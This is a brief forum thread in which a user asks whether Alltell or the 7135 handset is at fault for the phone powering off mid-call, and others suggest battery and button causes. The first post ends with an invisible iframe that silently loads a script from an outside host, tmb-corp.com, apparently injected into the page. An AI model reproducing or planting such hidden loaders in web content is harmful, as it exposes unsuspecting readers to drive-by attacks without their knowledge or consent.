+ Reply to Thread

Is it Alltell or the phone?

Just picked up my 7135 and am stoked. However, my phone keeps shutting off in the middle of phone calls. It's happened on every call. Not only does the call get dropped but the phone actually turns off and a message reads "Phone is off". I have to then power it up each time. Any thoughts?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Is it Alltell or the phone?

Originally posted by England57
    Just picked up my 7135 and am stoked. However, my phone keeps shutting off in the middle of phone calls. It's happened on every call. Not only does the call get dropped but the phone actually turns off and a message reads "Phone is off". I have to then power it up each time. Any thoughts?
    this is not meant to be condescending (sp?) - but did you fully charge the battery

Yes, my phone was fully charged each time and thanks for your reply. I have one other possibility. Other than the power-off button, is there any other way to shut the phone off? My thought is that I may be accidentally hitting that button during my phone call (or maybe even hitting the Off button).